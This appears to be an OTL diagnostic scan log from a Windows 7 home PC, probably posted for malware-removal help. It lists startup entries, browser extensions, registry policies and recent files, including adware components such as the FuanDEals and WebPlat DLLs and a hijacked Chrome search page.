FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\support@vdownloader.com: C:\Program Files\VDownloader\Addons\FireFox [2012/11/07 10:42:15 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components [2013/12/11 08:19:51 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 26.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2014/01/03 15:59:20 | 000,000,000 | ---D | M]
 
[2012/10/12 01:09:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Extensions
[2014/01/03 15:59:20 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions
[2014/01/02 08:59:38 | 000,535,529 | ---- | M] () (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\{73a6fe31-595d-460b-a920-fcc0f8843232}.xpi
[2014/01/02 08:55:53 | 000,915,554 | ---- | M] () (No name found) -- C:\Users\Wesley\AppData\Roaming\Mozilla\Firefox\Profiles\09qn4qhk.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi
[2013/12/11 08:19:51 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2013/12/11 08:19:51 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA}
[2013/12/11 08:19:50 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2013/12/11 08:19:54 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
CHR - homepage:
CHR - default_search_provider: Search The Web (privitize) ()
CHR - default_search_provider: search_url = http://searchou.com/...0000050b60df2d6
CHR - default_search_provider: suggest_url =
CHR - homepage: http://searchou.com/...0000050b60df2d6
CHR - plugin: Silverlight 3 (Enabled) = default_plugin
CHR - plugin: Error reading preferences file
CHR - Extension: No name found = C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\eoccbpoodnckjdnackiffhjfkogfhnhh\3.2.800\
CHR - Extension: FuanDEals = C:\Users\Wesley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pmjghjlpeglhomoeofllnjbmkfojelei\2.2\
 
O1 HOSTS File: ([2012/05/13 14:52:47 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2:64bit: - BHO: (DeAlEoxipRRESs) - {782901CE-CEDE-22C8-3EDF-BB5F7E77E683} - C:\ProgramData\DeAlEoxipRRESs\l7m.x64.dll ()
O2:64bit: - BHO: (FuanDEals) - {F2C4E697-A038-3939-62E6-60ABEF8A5266} - C:\ProgramData\FuanDEals\U.x64.dll ()
O2 - BHO: (DeAlEoxipRRESs) - {782901CE-CEDE-22C8-3EDF-BB5F7E77E683} - C:\ProgramData\DeAlEoxipRRESs\l7m.dll ()
O2 - BHO: (FuanDEals) - {F2C4E697-A038-3939-62E6-60ABEF8A5266} - C:\ProgramData\FuanDEals\U.dll ()
O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No CLSID value found.
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [NCUpdateHelper] C:\Program Files (x86)\NCWest\NCLauncher\NCUpdateHelper.exe (NCSOFT Corporation)
O4 - HKCU..\Run: [PlayNC Launcher]  File not found
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableLUA = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: PromptOnSecureDesktop = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000005 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000011 - C:\Windows\SysNative\vsocklib.dll (VMware, Inc.)
O10:64bit: - Protocol_Catalog9\Catalog_Entries64\000000000012 - C:\Windows\SysNative\vsocklib.dll (VMware, Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000005 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000011 - C:\Windows\SysWOW64\vsocklib.dll (VMware, Inc.)
O10 - Protocol_Catalog9\Catalog_Entries\000000000012 - C:\Windows\SysWOW64\vsocklib.dll (VMware, Inc.)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 10.6.2)
O16 - DPF: {CAFEEFAC-0016-0000-0034-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_34)
O16 - DPF: {CAFEEFAC-0017-0000-0006-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_06)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.7.0_06)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{13CBDABD-BDF8-4E2E-8B88-A4D9F83A7A58}: DhcpNameServer = 192.168.252.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{3CA9C62F-961E-44AC-995E-48E28CAF140A}: DhcpNameServer = 75.75.75.75 75.75.76.76
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{BB27403B-FA1B-4168-9C7B-4D4092729072}: DhcpNameServer = 68.87.68.166 68.87.74.166
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{EAEDBEA4-03ED-4E5F-BF50-FFDB1C264342}: DhcpNameServer = 75.75.75.75 75.75.76.76
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - AppInit_DLLs: (C:\PROGRA~3\WebPlat\WEBPLA~1.DLL) - C:\ProgramData\WebPlat\WebPlat_x64.dll ()
O20 - AppInit_DLLs: (c:\progra~3\webplat\webplat.dll) - c:\ProgramData\WebPlat\WebPlat.dll ()
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O32 - HKLM CDRom: AutoRun - 1
O32 - AutoRun File - [2013/05/05 09:36:45 | 000,000,000 | ---D | M] - C:\Autodesk -- [ NTFS ]
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/01/03 16:07:24 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/01/03 16:06:23 | 001,036,305 | ---- | C] (Thisisu) -- C:\Users\Wesley\Desktop\JRT.exe
[2014/01/03 15:50:07 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/01/03 15:24:05 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\SPReview
[2014/01/03 15:23:40 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\EventProviders
[2014/01/03 15:20:31 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\MRT
[2014/01/03 14:57:54 | 002,622,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wucltux.dll
[2014/01/03 14:57:54 | 000,057,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuauclt.exe
[2014/01/03 14:57:54 | 000,044,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wups2.dll
[2014/01/03 14:57:17 | 000,701,976 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuapi.dll
[2014/01/03 14:57:17 | 000,099,840 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wudriver.dll
[2014/01/03 14:57:17 | 000,038,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wups.dll
[2014/01/03 14:56:39 | 000,186,752 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuwebv.dll
[2014/01/03 14:56:39 | 000,036,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wuapp.exe
[2014/01/03 07:49:25 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2014/01/02 23:21:38 | 004,745,728 | ---- | C] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2014/01/02 07:58:28 | 000,388,608 | ---- | C] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/12/31 23:48:39 | 000,000,000 | ---D | C] -- C:\ProgramData\DeAlEoxipRRESs
[2013/12/31 23:48:37 | 000,000,000 | ---D | C] -- C:\ProgramData\pfkajdnmeplnnlemjfagojglpeelceaj
[2013/12/31 23:48:34 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\Packages
[2013/12/31 23:48:34 | 000,000,000 | ---D | C] -- C:\ProgramData\3bbeb3a6f04741f7
[2013/12/31 23:48:33 | 000,000,000 | ---D | C] -- C:\ProgramData\FuanDEals
[2013/12/29 13:43:57 | 000,000,000 | ---D | C] -- C:\Users\Wesley\.android
[2013/12/29 13:43:55 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Roaming\newnext.me
[2013/12/29 13:43:55 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\cache
[2013/12/29 13:43:53 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\genienext
[2013/12/28 08:37:50 | 000,000,000 | ---D | C] -- C:\ProgramData\WebPlat
[2013/12/27 11:21:56 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\TGitCache
[2013/12/27 11:20:16 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\src
[2013/12/27 11:20:16 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\bin
[2013/12/27 11:13:12 | 000,000,000 | ---D | C] -- C:\Users\Wesley\AppData\Local\FlashDevelop
[2013/12/27 11:11:00 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Git
[2013/12/27 11:10:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Git
[2013/12/27 11:08:22 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Desktop\SkyUI_stuff
[2013/12/27 11:05:23 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TortoiseGit
[2013/12/27 11:05:21 | 000,000,000 | ---D | C] -- C:\Program Files\TortoiseGit
[2013/12/27 11:01:15 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FlashDevelop
[2013/12/27 11:00:52 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\FlashDevelop
[2013/12/12 12:04:39 | 000,000,000 | ---D | C] -- C:\ProgramData\BioWare
[2013/12/12 12:00:12 | 000,000,000 | ---D | C] -- C:\Users\Wesley\Documents\BioWare
[2013/12/11 08:19:50 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2013/12/09 15:39:05 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\NCSOFT
[2013/12/09 15:38:41 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCWest
[2013/12/09 15:38:41 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\NCWest
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/01/03 16:17:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/01/03 16:11:03 | 000,026,512 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/01/03 16:11:03 | 000,026,512 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/01/03 16:06:51 | 000,877,058 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/01/03 16:06:51 | 000,729,420 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/01/03 16:06:51 | 000,147,176 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/01/03 16:06:27 | 001,036,305 | ---- | M] (Thisisu) -- C:\Users\Wesley\Desktop\JRT.exe
[2014/01/03 16:01:16 | 000,025,640 | ---- | M] (Windows ® Server 2003 DDK provider) -- C:\Windows\gdrv.sys
[2014/01/03 16:01:08 | 000,000,376 | -H-- | M] () -- C:\Windows\tasks\MagniPicUpdaterTask{1808030E-38EA-43D5-A427-B34BA55CD23C}.job
[2014/01/03 16:00:59 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/01/03 16:00:48 | 3206,471,680 | -HS- | M] () -- C:\hiberfil.sys
[2014/01/03 15:49:26 | 001,233,962 | ---- | M] () -- C:\Users\Wesley\Desktop\AdwCleaner.exe
[2014/01/03 15:40:42 | 002,219,728 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/01/03 15:30:50 | 000,175,616 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\msclmd.dll
[2014/01/03 15:30:50 | 000,152,576 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysWow64\msclmd.dll
[2014/01/03 07:49:28 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Wesley\Desktop\OTL(1).exe
[2014/01/03 07:47:22 | 000,000,559 | ---- | M] () -- C:\Users\Wesley\Desktop\MBR.zip
[2014/01/03 07:45:59 | 000,000,512 | ---- | M] () -- C:\Users\Wesley\Desktop\MBR.dat
[2014/01/02 23:21:44 | 004,745,728 | ---- | M] (AVAST Software) -- C:\Users\Wesley\Desktop\aswMBR.exe
[2014/01/02 23:08:40 | 000,987,410 | ---- | M] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
[2014/01/02 13:07:15 | 000,020,749 | ---- | M] () -- C:\Users\Wesley\Documents\Public_Executions_Tutorial.odt
[2014/01/02 07:58:31 | 000,388,608 | ---- | M] (Trend Micro Inc.) -- C:\Users\Wesley\Desktop\HiJackThis(1).exe
[2013/12/27 11:50:54 | 000,000,090 | ---- | M] () -- C:\Users\Wesley\mm.cfg
[2013/12/27 11:42:57 | 000,692,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2013/12/27 11:42:57 | 000,071,048 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2013/12/27 11:22:21 | 000,002,010 | ---- | M] () -- C:\Users\Wesley\Documents\SelectedItemMonitor.as2proj
[2013/12/27 06:34:31 | 000,005,756 | ---- | M] () -- C:\Users\Wesley\Documents\Database.kdb
[2013/12/26 08:48:29 | 000,294,402 | ---- | M] () -- C:\Users\Wesley\Desktop\ScreenShot472.jpg
[2013/12/26 08:48:19 | 000,285,855 | ---- | M] () -- C:\Users\Wesley\Desktop\ScreenShot471.jpg
[2013/12/25 11:09:45 | 000,014,582 | ---- | M] () -- C:\Users\Wesley\Desktop\animationtest.nif
[2013/12/25 11:09:45 | 000,000,118 | ---- | M] () -- C:\Users\Wesley\Desktop\animationtest.kf
[2013/12/25 08:14:22 | 000,008,878 | ---- | M] () -- C:\Users\Wesley\Desktop\watertestorb.nif
[2013/12/25 08:11:59 | 000,006,192 | ---- | M] () -- C:\Users\Wesley\AppData\Local\recently-used.xbel
[2013/12/17 18:42:54 | 000,007,624 | ---- | M] () -- C:\Users\Wesley\AppData\Local\Resmon.ResmonCfg
[2013/12/15 09:48:05 | 000,000,890 | ---- | M] () -- C:\Users\Public\Desktop\Nexus Mod Manager.lnk
[2013/12/13 12:49:17 | 000,000,023 | ---- | M] () -- C:\Windows\BlendSettings.ini
[2013/12/13 09:27:20 | 000,000,221 | ---- | M] () -- C:\Users\Wesley\Desktop\The Elder Scrolls IV Oblivion.url
[2013/12/12 17:34:53 | 000,000,641 | ---- | M] () -- C:\Users\Wesley\Documents\HT_todoList.rtf
[2013/12/12 10:51:15 | 000,000,221 | ---- | M] () -- C:\Users\Wesley\Desktop\Dragon Age Origins - Ultimate Edition.url
[2013/12/12 09:43:58 | 000,002,655 | ---- | M] () -- C:\Users\Wesley\Documents\Allowed_List.rtf
[2013/12/11 11:52:10 | 000,002,048 | ---- | M] () -- C:\Users\Wesley\Application Data\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk
[2013/12/09 15:39:05 | 000,002,248 | ---- | M] () -- C:\Users\Public\Desktop\Lineage II.lnk
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/01/03 15:49:21 | 001,233,962 | ---- | C] () -- C:\Users\Wesley\Desktop\AdwCleaner.exe
[2014/01/03 07:47:22 | 000,000,559 | ---- | C] () -- C:\Users\Wesley\Desktop\MBR.zip
[2014/01/03 07:45:59 | 000,000,512 | ---- | C] () -- C:\Users\Wesley\Desktop\MBR.dat
[2014/01/02 23:08:36 | 000,987,410 | ---- | C] () -- C:\Users\Wesley\Desktop\SecurityCheck.exe
[2014/01/02 13:07:13 | 000,020,749 | ---- | C] () -- C:\Users\Wesley\Documents\Public_Executions_Tutorial.odt
[2013/12/27 11:20:16 | 000,002,010 | ---- | C] () -- C:\Users\Wesley\Documents\SelectedItemMonitor.as2proj
[2013/12/27 11:13:14 | 000,000,090 | ---- | C] () -- C:\Users\Wesley\mm.cfg
[2013/12/26 08:48:29 | 000,294,402 | ---- | C] () -- C:\Users\Wesley\Desktop\ScreenShot472.jpg
[2013/12/26 08:48:19 | 000,285,855 | ---- | C] () -- C:\Users\Wesley\Desktop\ScreenShot471.jpg
[2013/12/25 11:09:45 | 000,000,118 | ---- | C] () -- C:\Users\Wesley\Desktop\animationtest.kf
[2013/12/25 08:14:22 | 000,008,878 | ---- | C] () -- C:\Users\Wesley\Desktop\watertestorb.nif
[2013/12/25 08:11:59 | 000,006,192 | ---- | C] () -- C:\Users\Wesley\AppData\Local\recently-used.xbel
[2013/12/25 06:19:47 | 000,014,582 | ---- | C] () -- C:\Users\Wesley\Desktop\animationtest.nif
[2013/12/13 09:27:20 | 000,000,221 | ---- | C] () -- C:\Users\Wesley\Desktop\The Elder Scrolls IV Oblivion.url
[2013/12/12 10:51:15 | 000,000,221 | ---- | C] () -- C:\Users\Wesley\Desktop\Dragon Age Origins - Ultimate Edition.url
[2013/12/11 13:35:46 | 000,000,641 | ---- | C] () -- C:\Users\Wesley\Documents\HT_todoList.rtf
[2013/12/11 13:27:41 | 000,002,655 | ---- | C] () -- C:\Users\Wesley\Documents\Allowed_List.rtf
[2013/12/09 15:39:05 | 000,002,248 | ---- | C] () -- C:\Users\Public\Desktop\Lineage II.lnk
[2013/08/09 12:11:40 | 000,000,089 | ---- | C] () -- C:\Users\Wesley\.gtk-bookmarks
[2013/03/08 08:41:00 | 000,000,600 | ---- | C] () -- C:\Users\Wesley\AppData\Local\PUTTY.RND
[2012/11/07 10:42:16 | 000,444,283 | ---- | C] () -- C:\Program Files\Common Files\WinPcapNmap.exe
[2012/03/31 01:16:37 | 000,000,600 | ---- | C] () -- C:\Users\Wesley\AppData\Roaming\winscp.rnd
[2012/01/13 11:50:02 | 000,151,552 | ---- | C] () -- C:\Windows\SysWow64\nvRegDev.dll
[2011/10/29 09:30:13 | 000,030,720 | ---- | C] () -- C:\Users\Wesley\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2011/07/08 06:43:10 | 000,009,707 | ---- | C] () -- C:\Users\Wesley\AppData\Roaming\C186.2A3
[2011/01/01 04:02:54 | 000,007,624 | ---- | C] () -- C:\Users\Wesley\AppData\Local\Resmon.ResmonCfg
 
========== ZeroAccess Check ==========
 
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2010/11/20 08:27:25 | 014,174,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2010/11/20 07:21:19 | 012,872,192 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 07:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== Files - Unicode (All) ==========
[2011/11/21 07:48:07 | 000,000,650 | ---- | M] ()(C:\Users\Wesley\AppData\Local\PMB Fik?s) -- C:\Users\Wesley\AppData\Local\PMB Fik聥s
[2011/11/21 07:48:07 | 000,000,650 | ---- | C] ()(C:\Users\Wesley\AppData\Local\PMB Fik?s) -- C:\Users\Wesley\AppData\Local\PMB Fik聥s

< End of report >

 

OTL Extras logfile created on: 1/3/2014 4:18:20 PM - Run 3
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Wesley\Desktop
64bit- Home Premium Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.98 Gb Total Physical Memory | 2.63 Gb Available Physical Memory | 66.03% Memory free
7.96 Gb Paging File | 6.45 Gb Available in Paging File | 80.98% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 931.41 Gb Total Space | 240.35 Gb Free Space | 25.80% Space Free | Partition Type: NTFS
Drive D: | 6.85 Gb Total Space | 0.00 Gb Free Space | 0.00% Space Free | Partition Type: UDF
Drive H: | 1863.01 Gb Total Space | 21.24 Gb Free Space | 1.14% Space Free | Partition Type: NTFS
Drive M: | 1863.01 Gb Total Space | 29.76 Gb Free Space | 1.60% Space Free | Partition Type: NTFS
 
Computer Name: VERONICA | User Name: Wesley | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl[@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html[@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
.url[@ = InternetShortcut] -- C:\Windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\Windows\SysWow64\control.exe (Microsoft Corporation)
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = FirefoxHTML] -- C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation)
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\SysWow64\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [print] -- rundll32.exe %SystemRoot%\system32\mshtml.dll,PrintHTML "%1" (Microsoft Corporation)
https [open] -- "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" -osint -url "%1" (Mozilla Corporation)
inffile [install] -- %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1 (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
